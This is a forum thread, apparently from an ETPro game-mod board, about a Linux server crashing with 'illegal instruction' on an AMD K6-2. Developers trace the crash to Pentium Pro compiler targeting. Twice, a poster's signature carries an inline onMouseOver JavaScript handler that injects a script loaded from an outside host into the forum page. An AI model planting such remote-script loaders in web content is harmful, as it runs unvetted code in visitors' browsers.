Linux ET Server crash on startup with etpro 3.1.0

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

[2GR]edhiltir.fr

Linux ET Server crash on startup with etpro 3.1.0

Post by [2GR]edhiltir.fr »

Hi,

I've tried to upgrade my server with etpro 3.1.0 without success (linux debian stable)

It always crash with at the same moment :
------- Game Initialization -------
gamename: etpro
gamedate: Jul 26 2004
Received signal 4, exiting...
With etpro 3.0.1, server works fine.

I've tried to start an etpro 3.1.0 dedicated server on my personal station (debian testing/unstable) with the same game config that my server, and it worked fine.

I've tried to test with an etpro 3.0.15 but links have been removed :(

Does the qagame.mp.i386.so of the etpro 3.1.0 has been compiled on the same computer that the etpro 3.0.1 version ? perhaps a libc issue ?

server : debian stable - kernel 2.4.25 - libc 2.2.5
station : debian testing/unstable - kernel 2.6.6 - libc 2.3.2
Rain

Re: Linux ET Server crash on startup with etpro 3.1.0

Post by Rain »

[2GR]edhiltir.fr wrote:Hi,

I've tried to upgrade my server with etpro 3.1.0 without success (linux debian stable)

It always crash with at the same moment :
------- Game Initialization -------
gamename: etpro
gamedate: Jul 26 2004
Received signal 4, exiting...
What kind of processor do you have?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
[2GR]edhiltir.fr

It's only a poor old K6-2 500 :oops:

So, with your question, and a rapid google search "Signal 4" means "illegal instruction". Does the .so has been compiled for i386 or a more recent arch ?

PS: It's a server for test, not for public or war use, so dont spend to much time on this
bani
Site Admin

Post by bani »

compiler optimizations for etpro were recently changed (by rain!) to target pentium or better cpu. k6 is a little too old for that.
[2GR]edhiltir.fr

Thanks for the answer.

My poor lonesone server wont be able to have new ETpro version anymore :cry: :cry:
Rain

Post by Rain »

bani wrote:compiler optimizations for etpro were recently changed (by rain!) to target pentium or better cpu. k6 is a little too old for that.
They always targeted that. gcc just actually listened this time. :P
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
faltytower

Post by faltytower »

Just needing clarification, this optimization also affects desktop/workstation running on old processor too, correct??
gotenks

Post by gotenks »

this should only affect servers, so if your desktop runs a server then yes, but shouldn't touch your clients
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
ReyalP

Post by ReyalP »

gotenks wrote:this should only affect servers, so if your desktop runs a server then yes, but shouldn't touch your clients
Eh ? assuming cgame is compiled witht the same options, it will likely cause the came error.

Mind you, if you cant find a pentium2 or better system for the price of carrying it away, you aren't looking very hard. While a k6-2 500 might serve a couple of slots with out too much lag, it would make a really awful client.
send lawyers, guns and money
Rain

Post by Rain »

Wolfenstein: Enemy Territory Minimum System Requirements wrote:* Intel® Pentium® III 600Mhz processor or AMD equivalent
The Linux binaries (even the dedicated server) have always been compiled with the target architecture set to 'Pentium Pro' (which is basically a P2, sans MMX), although the optimizer apparently never saw fit to actually use any ppro-specific instructions until just now. :?

I'm not at all surprised that people are still using older systems for ET, though… especially since I've seen players connect with the following cards:
1 3Dfx/Voodoo3 (tm)/2 TMUs/16 MB SDRAM/KNIICD (Jul 30 1999)
1 3Dfx/Voodoo5 (tm) SLI/2 TMUs/32 MB SDRAM/3DNow!/ICD (Nov 2 2000)
2 RAGE 128 Pro C21 AGP 4x x86/SSE
479 Intel Brookdale-G
(full list)

Not sure what we'll do in regards to this, though… We might fiddle with the optimizations again, although I don't know whether any of us has a K6 to test on anymore.